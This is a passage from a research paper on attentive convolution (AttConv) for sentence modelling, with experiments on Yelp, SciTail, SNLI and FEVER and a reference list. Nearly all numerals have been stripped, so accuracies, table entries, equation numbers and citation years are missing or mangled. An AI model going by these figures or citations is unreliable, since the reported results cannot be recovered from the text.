cor- responds to the filter parameters of a vanilla cnn and the only added parameter here is w ∈ rd×d, which only depends on the hidden size. this light attconv shows the basic princi- ples of using rnn-style attention mechanisms in convolution. our experiments show that this light version of attconv—even though it incurs a limited increase of parameters (i.e., w )—works much better than the vanilla siamese cnn and some of the pioneering attentive rnns. the fol- lowing two considerations show that there is space to improve its expressivity. (i) higher-level or more abstract representa- tions are required in subsequent layers. we find that directly forwarding the hidden states in tx or ty to the matching process does not work well in some tasks. pre-learning some more high-level or abstract representations helps in subsequent learn- ing phases. (ii) multi-granular alignments are preferred in the interaction modeling between tx and ty. table shows another example of textual entail- ment. on the unigram level, “out” in the premise matches with “out” in the hypothesis perfectly, whereas “out” in the premise is contradictory to “inside” in the hypothesis. but their context snippets—“come out” in the premise and “putting out a fire” in the hypothesis—clearly indicate that they are not semantically equivalent. and the gold conclusion for this pair is “neutral” (i.e., the hypothesis is possibly true). therefore, matching should be conducted across phrase granularities. we now present advanced attconv. it is more expressive and modular, based on the two forego- ing considerations (i) and (ii). . advanced attconv adel and schütze ( ) distinguish between focus and source of attention. the focus of atten- tion is the layer of the network that is reweighted by attention weights. the source of attention is the information source that is used to compute the attention weights. adel and schütze showed that increasing the scope of the attention source is beneficial. it possesses some preliminary princi- ples of the query/key/value distinction by vaswani et al. ( ). here, we further extend this princi- ple to define beneficiary of attention – the feature map (labeled “beneficiary” in figure (b)) that is contextualized by the attentive context (labeled “attentive context” in figure (b)). in the light attentive convolutional layer (figure (a)), the source of attention is hidden states in sentence tx, the focus of attention is hidden states of the con- text ty, and the beneficiary of attention is again the hidden states of tx; that is, it is identical to the source of attention. we now try to distinguish these three con- cepts further to promote the expressivity of an at- tentive convolutional layer. we call it “advanced attconv”; see figure (b). it differs from the light version in three ways: (i) attention source is learned by function fmgran(hx), feature map hx of tx acting as input; (ii) attention focus is learned by function fmgran(hy), feature map hy of con- text ty acting as input; and (iii) attention benefi- ciary is learned by function fbene(hx), hx acting as input. both functions fmgran() and fbene() are based on a gated convolutional function fgconv(): oi = tanh(wh · ii + bh) ( ) gi = sigmoid(wg · ii + bg) ( ) fgconv(ii) = gi ·ui + ( −gi) ·oi ( ) where ii is a composed representation, denoting a generally defined input phrase [· · · , ui, · · · ] of arbitrary length with ui as the central unigram- level hidden state, and the gate gi sets a trade-off between the unigram-level input ui and the tem- porary output oi at the phrase-level. we elaborate these modules in the remainder of this subsection. attention source. first, we present a general instance of generating source of attention by func- tion fmgran(h), learning word representations in multi-granular context. in our system, we con- sider granularities and , corresponding to unigram hidden state and trigram hidden state. for the uni-hidden state case, it is a gated convolution layer: hxuni,i = fgconv(h x i ) ( ) for the tri-hidden state case: hxtri,i = fgconv([h x i− , h x i , h x i+ ]) ( ) finally, the overall hidden state at position i is the concatenation of huni,i and htri,i: hxmgran,i = [h x uni,i, h x tri,i] ( ) that is, fmgran(hx) = hxmgran. such a kind of comprehensive hidden state can encode the semantics of multigranular spans at a position, such as “out” and “come out of.” gating here implicitly enables cross-granular alignments in subsequent attention mechanism as it sets highway connections (srivastava et al., ) between the input granularity and the output granularity. attention focus. for simplicity, we use the same architecture for the attention source (just in- troduced) and for the attention focus, ty (i.e., for the attention focus: fmgran(hy) = h y mgran; see figure (b)). thus, the focus of attention will participate in the matching process as well as be reweighted to form an attentive context vector. we leave exploring different architectures for atten- tion source and focus for future work. another benefit of multi-granular hidden states in attention focus is to keep structure information in the context vector. in standard attention mechanisms in rnns, all hidden states are average-weighted as a context vector, and the order information is missing. by introducing hidden states of larger granularity into cnns that keep the local order or structures, we boost the attentive effect. attention beneficiary. in our system, we sim- ply use fgconv() over uni-granularity to learn a more abstract representation over the current hid- den representations in hx, so that fbene(h x i ) = fgconv(h x i ) ( ) subsequently, the attentive context vector cxi is generated based on attention source feature map fmgran(hx) and attention focus feature map fmgran(h y), according to the description of the light attconv. then attentive convolution is conducted over attention beneficiary feature map fbene(h x) and the attentive context vectors cx to get a higher-layer feature map for the sentence tx. . analysis compared with the standard attention mechanism in rnns, attconv has a similar matching func- tion and a similar process of computing context vectors, but differs in three ways. (i) the dis- crimination of attention source, focus, and ben- eficiary improves expressivity. (ii) in cnns, the surrounding hidden states for a concrete position are available, so the attention matching is able to encode the left context as well as the right con- text. in rnns, however, we need bidirectional rnns to yield both left and right context representations. (iii) as attentive convolution can be implemented by summing up two separate convolution steps (equations and ), this ar- chitecture provides both attentive representations and representations computed without the use of attention. this strategy is helpful in practice to use richer representations for some nlp prob- lems. in contrast, such a clean modular separa- tion of representations computed with and without attention is harder to realize in attention-based rnns. prior attention mechanisms explored in cnns mostly involve attentive pooling (dos santos et al., ; yin et al., ); namely, the weights of the post-convolution pooling layer are determined by attention. these weights come from the matching process between hidden states of two text pieces. however, a weight value is not informative enough to tell the relationships between aligned terms. con- sider a textual entailment sentence pair for which we need to determine whether “inside −→ outside” holds. the matching degree (take cosine similar- ity as example) of these two words is high: for ex- ample, ≈ . in word vec (mikolov et al., ) and glove (pennington et al., ). on the other hand, the matching score between “inside” and “in” is lower: . in word vec, . in glove. apparently, the higher number . does not mean that “outside” is more likely than “in” to be en- tailed by “inside.” instead, joint representations for aligned phrases [hinside, houtside], [hinside, hin] are more informative and enable finer-grained rea- soning than a mechanism that can only transmit information downstream by matching scores. we modify the conventional cnn filters so that “in- side” can make the entailment decision by looking at the representation of the counterpart term (“out- side” or “in”) rather than a matching score. a more damaging property of attentive pooling is the following. even if matching scores could convey the phrase-level entailment degree to some extent, matching weights, in fact, are not lever- aged to make the entailment decision directly; instead, they are used to weight the sum of the output hidden states of a convolution as the global sentence representation. in other words, fine-grained entailment degrees are likely to be lost in the summation of many vectors. this illustrates why attentive context vectors partici- pating in the convolution operation are expected to be more effective than post-convolution atten- tive pooling (more explanations in § . , paragraph “visualization”). intra-context attention and extra-context at- tention. figures (a) and (b) depict the model- ing of a sentence tx with its context ty. this is a common application of attention mechanism in the literature; we call it extra-context attention. but attconv can also be applied to model a single text input, that is, intra-context attention. consider a sentiment analysis example: “with the nba all-star game in the books i think we can all agree that this was definitely one to re- member. not because of the three-point shootout, the dunk contest, or the game itself but because of the ludicrous trade that occurred after the festivi- ties.” this example contains informative points at different locations (“remember” and “ludicrous”); conventional cnns’ ability to model nonlocal de- pendency is limited because of fixed-size filter widths. in attconv, we can set ty = tx. the attentive context vector then accumulates all re- lated parts together for a given position. in other words, our intra-context attentive convolution is able to connect all related spans together to form a comprehensive decision. this is a new way to broaden the scope of conventional filter widths: a filter now covers not only the local window, but also those spans that are related, but are beyond the scope of the window. comparison to transformer. the “focus” in attconv corresponds to “key” and “value” in transformer; that is, our versions of “key” and “value” are the same, coming from the con- text sentence. the “query” in transformer cor- responds to the “source” and “beneficiary” of attconv; namely, our model has two perspec- tives to utilize the context: one acts as a real query (i.e., “source”) to attend the context, the other (i.e., “beneficiary”) takes the attentive con- our “source-focus-beneficiary” mechanism was inspired by adel and schütze ( ). vaswani et al. ( ) later pub- lished the transformer model, which has a similar “query- key-value” mechanism. text back to improve the learned representation of itself. if we reduce attconv to unigram convo- lutional filters, it is pretty much a single trans- former layer (if we neglect the positional encoding in transformer and unify the “query-key-value” and “source-focus-beneficiary” mechanisms). experiments we evaluate attconv on sentence modeling in three scenarios: (i) zero-context, that is, intra- context; the same input sentence acts as tx as well as ty; (ii) single-context, that is, textual entailment—hypothesis modeling with a single premise as the extra-context; and (iii) multiple- context, namely, claim verification—claim mod- eling with multiple extra-contexts. . common set-up and common baselines all experiments share a common set-up. the input is represented using -dimensional publicly available word vec (mikolov et al., ) em- beddings; out of vocabulary embeddings are ran- domly initialized. the architecture consists of the following four layers in sequence: embedding, attentive convolution, max-pooling, and logistic regression. the context-aware representation of tx is forwarded to the logistic regression layer. we use adagrad (duchi et al., ) for training. embeddings are fine-tuned during training. hyper- parameter values include: learning rate . , hidden size , batch size , filter width . all experiments are designed to explore com- parisons in three aspects: (i) within attconv, “light” vs. “advanced”; (ii) “attentive convolution” vs. “attentive pooling”/“attention only”; and (iii) “attentive convolution” vs. “attentive rnn”. to this end, we always report “light” and “advanced” attconv performance and compare against five types of common baselines: (i) w/o context; (ii) w/o attention; (iii) w/o convolution: similar to the transformer’s principle (vaswani et al., ), we discard the convolution oper- ation in equation ( ) and forward the addition of the attentive context cxi and the h x i into a fully connected layer. to keep enough parame- ters, we stack in total four layers so that “w/o convolution” has the same size of parameters as light-attconv; (iv) with attention: rnns with attention and cnns with attentive pooling; and (v) prior state of the art, typeset in italics. systems acc w /o at te nt io n paragraph vector . lin et al. bi-lstm . lin et al. cnn . multichannelcnn (kim) . w it h at te nt io n cnn+internal attention . abcnn . apcnn . attentive-lstm . lin et al. rnn self-att. . a t t c o n v light . w/o convolution . advanced . ∗ table : system comparison of sentiment analysis on yelp. significant improvements over state of the art are marked with ∗ (test of equal proportions, p < . ). . sentence modeling with zero-context: sentiment analysis we evaluate sentiment analysis on a yelp bench- mark released by lin et al. ( ): review-star pairs in sizes k (train), , (dev), and , (test). most text instances in this data set are long: %, %, % percentiles are , , and words, respectively. the task is five-way classification: to stars. the measure is accuracy. we use this benchmark because the predominance of long texts lets us evaluate the system perfor- mance of encoding long-range context, and the system by lin et al. is directly related to attconv in intra-context scenario. baselines. (i) w/o attention. three baselines from lin et al. ( ): paragraph vector (le and mikolov, ) (unsupervised sentence rep- resentation learning), bilstm, and cnn. we also reimplement multichannelcnn (kim, ), recognized as a simple but surprisingly strong sentence modeler. (ii) with attention. a vanilla “attentive-lstm” by rocktäschel et al. ( ). “rnn self-attention” (lin et al., ) is di- rectly comparable to attconv: it also uses intra- context attention. “cnn+internal attention” (adel and schütze, ), an intra-context attention idea similar to, but less complicated than, lin et al. ( ). abcnn & apcnn – cnns with atten- tive pooling. results and analysis. table shows that advanced-attconv surpasses its “light” coun- terpart, and obtains significant improvement over the state of the art. indices of sorted text groups . . . . . . . a c c multichannelcnn attconv . +diff of two curves figure : attconv vs. multichannelcnn for groups of yelp text with ascending text lengths. attconv performs more robustly across different lengths of text. in addition, attconv surpasses attentive pool- ing (abcnn&apcnn) with a big margin (> %) and outperforms the representative attentive-lstm (> %). furthermore, it outperforms the two self- attentive models: cnn+internal attention (adel and schütze, ) and rnn self-attention (lin et al., ), which are specifically designed for single-sentence modeling. adel and schütze ( ) generate an attention weight for each cnn hidden state by a linear transformation of the same hidden state, then compute weighted average over all hidden states as the text representation. lin et al. ( ) extend that idea by generating a group of attention weight vectors, then rnn hid- den states are averaged by those diverse weighted vectors, allowing extracting different aspects of the text into multiple vector representations. both works are essentially weighted mean pooling, sim- ilar to the attentive pooling in yin et al. ( ) and dos santos et al. ( ). next, we compare attconv with multichan- nelcnn, the strongest baseline system (“w/o attention”), for different length ranges to check whether attconv can really encode long-range context effectively. we sort the , test instances by length, then split them into groups, each consisting of instances. figure shows per- formance of attconv vs. multichannnelcnn. we observe that attconv consistently outper- forms multichannelcnn for all lengths. further- more, the improvement over multichannelcnn generally increases with length. this is evidence that attconv more effectively models long text. #instances #entail #neutral train , , , dev , test , , total , , , table : statistics of scitail data set. systems acc w /o at te nt io n majority class . w/o context . bi-lstm . ngram model . bi-cnn . w it h at te nt io n enhanced lstm . attentive-lstm . decomp-att . dgem . apcnn . abcnn . attconv-light . w/o convolution . attconv-advanced . table : attconv vs. baselines on scitail. this is likely because of attconv’s capability to encode broader context in its filters. . sentence modeling with a single context: textual entailment data set. scitail (khot et al., ) is a textual entailment benchmark designed specifically for a real-world task: multi-choice question answering. all hypotheses tx were obtained by rephrasing (question, correct answer) pairs into single sen- tences, and premises ty are relevant web sentences retrieved by an information retrieval method. then the task is to determine whether a hypothesis is true or not, given a premise as context. all (tx, ty) pairs are annotated via crowdsourcing. accuracy is reported. table shows examples and table gives statistics. by this construction, a substantial performance improvement on scitail is equivalent to a better qa performance (khot et al., ). the hypoth- esis tx is the target sentence, and the premise ty acts as its context. baselines. apart from the common baselines (see section . ), we include systems covered by khot et al. ( ): (i) n-gram overlap: an overlap baseline, considering lexical granularity such as unigrams, one-skip bigrams, and one- skip trigrams. (ii) decomposable attention model (decomp-att) (parikh et al., ): explore atten- tion mechanisms to decompose the task into sub- tasks to solve in parallel. (iii) enhanced lstm (chen et al., b): enhance lstm by taking into account syntax and semantics from parsing information. (iv) dgem (khot et al., ): a decomposed graph entailment model, the current state-of-the-art. table presents results on scitail. (i) within attconv, “advanced” beats “light” by . %; (ii) “w/o convolution” and attentive pooling (i.e., abcnn & apcnn) get lower performances by %– %; (iii) more complicated attention mech- anisms equipped into lstm (e.g., “attentive- lstm” and “enhanced-lstm”) perform even worse. error analysis. to better understand the attconv in scitail, we study some error cases listed in table . language conventions. pair # uses sequen- tial commas (i.e., in “the egg, larva, pupa, and adult”) or a special symbol sequence (i.e., in “egg −> larva −> pupa −> adult”) to form a set or sequence; pair # has “a (or b)” to express the equivalence of a and b. this challenge is expected to be handled by dnns with specific training signals. knowledge beyond the text ty. in # , “be- cause smaller amounts of water evaporate in the cool morning” cannot be inferred from the premise ty directly. the main challenge in # is to dis- tinguish “weight” from “force,” which requires background physical knowledge that is beyond the presented text here and beyond the expressivity of word embeddings. complex discourse relation. the premise in # has an “or” structure. in # , the inserted phrase “with about , species” makes the connection between “nonvascular plants” and “the mosses, liverworts, and hornworts” hard to detect. both instances require the model to decode the dis- course relation. attconv on snli. table shows the com- parison. we observe that: (i) classifying hypothe- ses without looking at premises, that is, “w/o context” baseline, results in a large improvement over the “majority baseline.” this verifies the strong bias in the hypothesis construction of the snli data set (gururangan et al., ; poliak et al., ). (ii) attconv (advanced) surpasses # (premise ty, hypothesis tx) pair g/p challenge (ty) these insects have life stages, the egg, larva, pupa, and adult. / language conventions (tx) the sequence egg −> larva −> pupa −> adult shows the life cycle of some insects. (ty) . . . the notochord forms the backbone (or vertebral column). / language conventions(tx) backbone is another name for the vertebral column. (ty) water lawns early in the morning . . . prevent evaporation. / beyond text(tx) watering plants and grass in the early morning is a way to conserve water because smaller amounts of water evaporate in the cool morning. (ty) . . . the si unit . . . for force is the newton (n) and is defined as (kg·m/s− ). / beyond text (tx) newton (n) is the si unit for weight. (ty) heterotrophs get energy and carbon from living plants or animals (consumers) or from dead organic matter (decomposers). / discourse relation (tx) mushrooms get their energy from decomposing dead organisms. (ty) . . . are a diverse assemblage of three phyla of nonvascular plants, with / discourse relation about , species, that includes the mosses, liverworts, and hornworts. (tx) moss is best classified as a nonvascular plant. table : error cases of attconv in scitail. “. . . ”: truncated text. “g/p”: gold/predicted label. systems #para acc w /o at te nt io n majority class . w/o context (i.e., hypothesis only) k . bi-lstm (bowman et al., ) k . bi-cnn k . tree-cnn (mou et al., ) . m . nes (munkhdalai and yu, ) . m . w it h at te nt io n attentive-lstm (rocktäschel) k . self-attentive (lin et al., ) m . match-lstm (wang and jiang) . m . lstmn (cheng et al., ) . m . decomp-att (parikh) k . enhanced lstm (chen et al., b) . m . abcnn (yin et al., ) k . apcnn (dos santos et al., ) k . attconv – light k . w/o convolution k . attconv – advanced k . state-of-the-art (peters et al., ) m . table : performance comparison on snli test. en- semble systems are not included. all “w/o attention” baselines and “with attention” cnn baselines (i.e., attentive pooling), obtaining a performance ( . %) that is close to the state of the art ( . %). we also report the parameter size in snli as most baseline systems did. table shows that, in comparison to these baselines, our attconv (light and advanced) has a more lim- ited number of parameters, yet its performance is competitive. visualization. in figure , we visualize the attention mechanisms explored in attentive con- volution (figure (a)) and attentive pooling (figure (b)). figure (a) explores the visualization of two kinds of features learned by light attconv in snli data set (most are short sentences with rich phrase-level reasoning): (i) ei,j in equa- tion ( ) (after softmax), which shows the attention distribution over context ty by the hidden state hxi in sentence t x; (ii) hxi,new in equation ( ) for i = , , · · · , |tx|; it shows the context- aware word features in tx. by the two visual- ized features, we can identify which parts of the context ty are more important for a word in sen- tence tx, and a max-pooling, over those context- driven word representations, selects and forwards dominant (word, leftcontext, rightcontext, attcontext) combinations to the final decision maker. figure (a) shows the features of sentence tx = “a dog jumping for a frisbee in the snow” con- ditioned on the context ty = “an animal is out- side in the cold weather, playing with a plastic toy.” observations: (i) the right figure shows that the attention mechanism successfully aligns some cross-sentence phrases that are informative to the textual entailment problem, such as “dog” to “animal” (i.e., cxdog ≈ “animal”), “frisbee” to “plastic toy” and “playing” (i.e., cxfrisbee ≈ “plastic toy”+“playing”); (ii) the left figure shows a max-pooling over the generated features of filter_ and filter_ will focus on the context- aware phrases (a, dog, jumping, cxdog) and (a, for simplicity, we show out of attconv filters. a dog for a in the .snow ju m pi ng fr is be e c x dog c x fris. an in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y (a) visualization for features generated by attconv’s filters on sentence tx and ty. a max-pooling, over filter_ , locates the phrase (a, dog, jumping, cxdog), and locates the phrase (a, frisbee, in, c x f risbee) via filter_ . “c x dog” (resp. c x f ris.)—the attentive context of “dog” (resp. “frisbee”) in tx—mainly comes from “animal” (resp. “toy” and “playing”) in ty. a dog for a in the .snow ju m pi ng fr is be e an in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y convolution output (filter width= ) (b) attention visualization for attentive pooling (abcnn). based on the words in tx and ty, first, a convolution layer with filter width outputs hidden states for each sentence, then each hidden state will obtain an attention weight for how well this hidden state matches towards all the hidden states in the other sentence, and finally all hidden states in each sentence will be weighted and summed up as the sentence representation. this visualization shows that the spans “dog jumping for” and “in the snow” in tx and the spans “animal is outside” and “in the cold” in ty are most indicative to the entailment reasoning. figure : attention visualization for attentive convolution (top) and attentive pooling (bottom) between sentence tx = “a dog jumping for a frisbee in the snow” (left) and sentence ty = “an animal is outside in the cold weather, playing with a plastic toy” (right). frisbee, in, cxfrisbee) respectively; the two phrases are crucial to the entailment reasoning for this (ty, tx) pair. figure (b) shows the phrase-level (i.e., each consecutive trigram) attentions after the convolu- tion operation. as figure shows, a subsequent pooling step will weight and sum up those phrase- level hidden states as an overall sentence represen- tation. so, even though some phrases such as “in the snow” in tx and “in the cold” in ty show im- portance in this pair instance, the final sentence representation still (i) lacks a fine-grained phrase- to-phrase reasoning, and (ii) underestimates some indicative phrases such as “a dog” in tx and “an animal” in ty. briefly, attentive convolution first performs phrase-to-phrase, inter-sentence reasoning, then composes features; attentive pooling composes #supported #refuted #nei train , , , dev , , , test , , , table : statistics of claims in the fever data set. phrase features as sentence representations, then performs reasoning. intuitively, attentive convo- lution better fits the way humans conduct entail- ment reasoning, and our experiments validate its superiority—it is the hidden states of the aligned phrases rather than their matching scores that support better representation learning and decision-making. the comparisons in both scitail and snli show that: • cnns with attentive convolution (i.e., attconv) outperform the cnns with at- tentive pooling (i.e., abcnn and apcnn); • some competitors got over-tuned on snli while demonstrating mediocre performance in scitail—a real-world nlp task. our sys- tem attconv shows its robustness in both benchmark data sets. . sentence modeling with multiple contexts: claim verification data set. for this task, we use fever (thorne et al., ); it infers the truthfulness of claims by extracted evidence. the claims in fever were manually constructed from the introductory sec- tions of about k popular wikipedia articles in the june dump. claims have . tokens on average. table lists the claim statistics. in addition to claims, fever also provides a wikipedia corpus of approximately . million ar- ticles, from which gold evidences are gathered and provided. figure shows the distributions of sen- tence sizes in fever’s ground truth evidence set (i.e., the context size in our experimental set-up). we can see that roughly % of evidence instances cover more than one sentence and roughly % cover more than two sentences. each claim is labeled as supported, re- futed, or notenoughinfo (nei) given the gold evidence. the standard fever task also explores the performance of evidence extraction, evaluated by f between extracted evidence and gold evidence. this work focuses on the claim en- tailment part, assuming the evidences are provided (extracted or gold). more specifically, we treat a claim as tx, and its evidence sentences as context ty. > #context for each claim sentence ... % . . . . . . . . . . . figure : distribution of #sentence in fever evi- dence. this task has two evaluations: (i) all— accuracy of claim verification regardless of the validness of evidence; (ii) subset—verification accuracy of a subset of claims, in which the gold evidence for supported and refuted claims must be fully retrieved. we use the official eval- uation toolkit. set-ups. (i) we adopt the same retrieved evi- dence set (i.e, contexts ty) as thorne et al. ( ): top- most relevant sentences from top- retrieved wiki pages by a document retriever (chen et al., a). the quality of this evidence set against the ground truth is: . (recall), . (precision), . (f ) on dev, and . (recall), . (pre- cision), . (f ) on test. this set-up challenges our system with potentially unrelated or even mis- leading context. (ii) we use the ground truth evi- dence as context. this lets us determine how far our attconv can go for this claim verification problem once the accurate evidence is given. baselines. we first include the two systems ex- plored by thorne et al. ( ): (i) mlp: a multi- layer perceptron baseline with a single hidden layer, based on tf-idf cosine similarity between the claim and the evidence (riedel et al., ); (ii) decomp-att (parikh et al., ): a decompos- able attention model that is tested in scitail and snli before. note that both baselines first relied on an information retrieval system to extract the top- relevant sentences from the retrieved top- wiki pages as evidence for claims, then concate- nated all evidence sentences as a longer context for a claim. https://github.com/sheffieldnlp/fever- scorer. https://github.com/sheffieldnlp/fever-scorer https://github.com/sheffieldnlp/fever-scorer retrie. evi. gold system all sub evi. de v mlp . . . bi-cnn . . . apcnn . . . abcnn . . . attentive-lstm . . . decomp-att . . . attconv light,context-wise . . . w/o conv. . . . light,context-conc . . . w/o conv. . . . advan.,context-wise . . . advan.,context-conc . . . te st (thorne et al., ) . . – attconv . . . table : performance on dev and test of fever. in “gold evi.” scenario, all subset are the same. we then consider two variants of our attconv in dealing with modeling of tx with variable-size context ty. (i) context-wise: we first use all evidence sentences one by one as context ty to guide the representation learning of the claim tx, generating a group of context-aware representation vectors for the claim, then we do element-wise max-pooling over this vector group as the final representation of the claim. (ii) context-conc: concatenate all evidence sentences as a single piece of context, then model the claim based on this context. this is the same preprocessing step as thorne et al. ( ) did. results. table compares our attconv in dif- ferent set-ups against the baselines. first, attconv surpasses the top competitor “decomp-att,” reported in thorne et al. ( ), with big mar- gins in dev (all: . vs. . ) and test (all: . vs. . ). in addition, “advanced- attconv” consistently outperforms its “light” counterpart. moreover, attconv surpasses at- tentive pooling (i.e., abcnn & apcnn) and “attentive-lstm” by > % in all, > % in sub and > % in “gold evi.” figure further explores the fine-grained per- formance of attconv for different sizes of gold evidence (i.e., different sizes of context ty). the system shows comparable performances for sizes and . even for context sizes larger than , it only drops by %. > gold #context for each claim . . . . . . . . ac c (% ) figure : fine-grained attconv performance given variable-size golden fever evidence as claim’s con- text. these experiments on claim verification clearly show the effectiveness of attconv in sen- tence modeling with variable-size context. this should be attributed to the attention mechanism in attconv, which enables a word or a phrase in the claim tx to “see” and accumulate all related clues even if those clues are scattered across mul- tiple contexts ty. error analysis. we do error analysis for “re- trieved evidence” scenario. error case # is due to the failure of fully re- trieving all evidence. for example, a successful support of the claim “weekly idol has a host born in the year ” requires the information compo- sition from three evidence sentences, two from the wiki article “weekly idol,” and one from “jeong hyeong-don.” however, only one of them is retrieved in the top- candidates. our system pre- dicts refuted. this error is more common in instances for which no evidence is retrieved. error case # is due to the insufficiency of rep- resentation learning. consider the wrong claim “corsica belongs to italy” (i.e., in refuted class). even though good evidence is retrieved, the system is misled by noise evidence: “it is located . . . west of the italian peninsula, with the nearest land mass being the italian island . . . ”. error case # is due to the lack of advanced data preprocessing. for a human, it is very easy to “re- fute” the claim “telemundo is an english-language television network” by the evidence “telemundo is an american spanish-language terrestrial tele- vision . . . ” (from the “telemundo” wikipage), by checking the keyphrases: “spanish-language” vs. “english-language.” unfortunately, both tokens are unknown words in our system; as a result, they do not have informative embeddings. a more careful data preprocessing is expected to help. summary we presented attconv, the first work that en- ables cnns to acquire the attention mechanism commonly used in rnns. attconv combines the strengths of cnns with the strengths of the rnn attention mechanism. on the one hand, it makes broad and rich context available for prediction, either context from external inputs (extra-context) or internal inputs (intra-context). on the other hand, it can take full advantage of the strengths of convolution: it is more order- sensitive than attention in rnns and local-context information can be powerfully and efficiently modeled through convolution filters. our experi- ments demonstrate the effectiveness and flexibil- ity of attconv when modeling sentences with variable-size context. acknowledgments we gratefully acknowledge funding for this work by the european research council (erc # ). we would like to thank the anonymous reviewers for their helpful comments. references heike adel and hinrich schütze. . exploring different dimensions of attention for uncertainty detection. in proceedings of eacl, pages – , valencia, spain. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in pro- ceedings of iclr, san diego, usa. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural lan- guage inference. in proceedings of emnlp, pages – , lisbon, portugal. danqi chen, adam fisch, jason weston, and antoine bordes. a. reading wikipedia to answer open-domain questions. in proceedings of acl, pages – , vancouver, canada. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. b. enhanced lstm for natural language inference. in pro- ceedings of acl, pages – , vancouver, canada. jianpeng cheng, li dong, and mirella lapata. . long short-term memory-networks for machine reading. in proceedings of emnlp, pages – , austin, usa. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel p. kuksa. . natural language processing (almost) from scratch. journal of machine learning research, : – . ido dagan, dan roth, mark sammons, and fabio massimo zanzotto. . recognizing textual entailment: models and applications. synthesis lectures on human language tech- nologies. morgan & claypool. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learn- ing and stochastic optimization. journal of ma- chine learning research, : – . jeffrey l. elman. . finding structure in time. cognitive science, ( ): – . jonas gehring, michael auli, david grangier, denis yarats, and yann n. dauphin. . convolutional sequence to sequence learning. in proceedings of icml, pages – , sydney, australia. alex graves. . generating sequences with re- current neural networks. corr, abs/ . . alex graves, greg wayne, and ivo danihelka. . neural turing machines. corr, abs/ . . suchin gururangan, swabha swayamdipta, omer levy, roy schwartz, samuel r. bowman, and noah a. smith. . annotation artifacts in natural language inference data. in proceedings of naacl-hlt, pages – , new orleans, usa. karl moritz hermann, tomás kociský, edward grefenstette, lasse espeholt, will kay, mustafa suleyman, and phil blunsom. . teach- ing machines to read and comprehend. in pro- ceedings of nips, pages – , montreal, canada. nal kalchbrenner, edward grefenstette, and phil blunsom. . a convolutional neural net- work for modelling sentences. in proceedings of acl, pages – , baltimore, usa. tushar khot, ashish sabharwal, and peter clark. . scitail: a textual entailment dataset from science question answering. in proceed- ings of aaai, pages – , new orleans, usa. yoon kim. . convolutional neural networks for sentence classification. in proceedings of emnlp, pages – , doha, qatar. yoon kim, carl denton, luong hoang, and alexander m. rush. . structured atten- tion networks. in proceedings of iclr, toulon, france. ankit kumar, ozan irsoy, peter ondruska, mohit iyyer, james bradbury, ishaan gulrajani, victor zhong, romain paulus, and richard socher. . ask me anything: dynamic memory networks for natural language process- ing. in proceedings of icml, pages – , new york city, usa. quoc le and tomas mikolov. . distributed representations of sentences and documents. in proceedings of icml, pages – , beijing, china. yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. proceedings of the ieee, ( ): – . jiwei li, minh-thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of acl, pages – , beijing, china. jindrich libovický and jindrich helcl. . at- tention strategies for multi-source sequence- to-sequence learning. in proceedings of acl, pages – , vancouver, canada. zhouhan lin, minwei feng, cícero nogueira dos santos, mo yu, bing xiang, bowen zhou, and yoshua bengio. . a structured self- attentive sentence embedding. in proceedings of iclr, toulon, france. minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of emnlp, pages – , lisbon, portugal. yishu miao, lei yu, and phil blunsom. . neural variational inference for text processing. in proceedings of icml, pages – , new york city, usa. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . dis- tributed representations of words and phrases and their compositionality. in proceedings of nips, pages – , lake tahoe, usa. lili mou, rui men, ge li, yan xu, lu zhang, rui yan, and zhi jin. . natural language in- ference by tree-based convolution and heuristic matching. in proceedings of acl, pages – , berlin, germany. tsendsuren munkhdalai and hong yu. . neural semantic encoders. in proceedings of eacl, pages – , valencia, spain. ramesh nallapati, bowen zhou, cícero nogueira dos santos, Çaglar gülçehre, and bing xiang. . abstractive text summarization using sequence-to-sequence rnns and beyond. in pro- ceedings of conll, pages – , berlin, germany. ankur p. parikh, oscar täckström, dipanjan das, and jakob uszkoreit. . a decomposable attention model for natural language inference. in proceedings of emnlp, pages – , austin, usa. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of emnlp, pages – , doha, qatar. matthew e. peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep contextu- alized word representations. in proceedings of naacl-hlt, pages – , new orleans, usa. adam poliak, jason naradowsky, aparajita haldar, rachel rudinger, and benjamin van durme. . hypothesis only baselines in natural language inference. in proceedings of *sem, pages – , new orleans, usa. benjamin riedel, isabelle augenstein, georgios p. spithourakis, and sebastian riedel. . a simple but tough-to-beat baseline for the fake news challenge stance detection task. corr, abs/ . . tim rocktäschel, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, and phil blunsom. . reasoning about entailment with neural attention. in proceedings of iclr, san juan, puerto rico. cícero nogueira dos santos, ming tan, bing xiang, and bowen zhou. . attentive pool- ing networks. corr, abs/ . . min joon seo, aniruddha kembhavi, ali farhadi, and hannaneh hajishirzi. . bidirectional attention flow for machine comprehension. in proceedings of iclr, toulon, france. lifeng shang, zhengdong lu, and hang li. . neural responding machine for short- text conversation. in proceedings of acl, pages – , beijing, china. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . training very deep networks. in proceedings of nips, pages – , montreal, canada. james thorne, andreas vlachos, christos christodoulopoulos, and arpit mittal. . fever: a large-scale dataset for fact extraction and verification. in proceedings of naacl- hlt, pages – , new orleans, usa. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, lukasz kaiser, and illia polosukhin. . at- tention is all you need. in proceedings of nips, pages – , long beach, usa. shuohang wang and jing jiang. . learn- ing natural language inference with lstm. in proceedings of naacl-hlt, pages – , san diego, usa. shuohang wang and jing jiang. . machine comprehension using match-lstm and an- swer pointer. in proceedings of iclr, toulon, france. wenhui wang, nan yang, 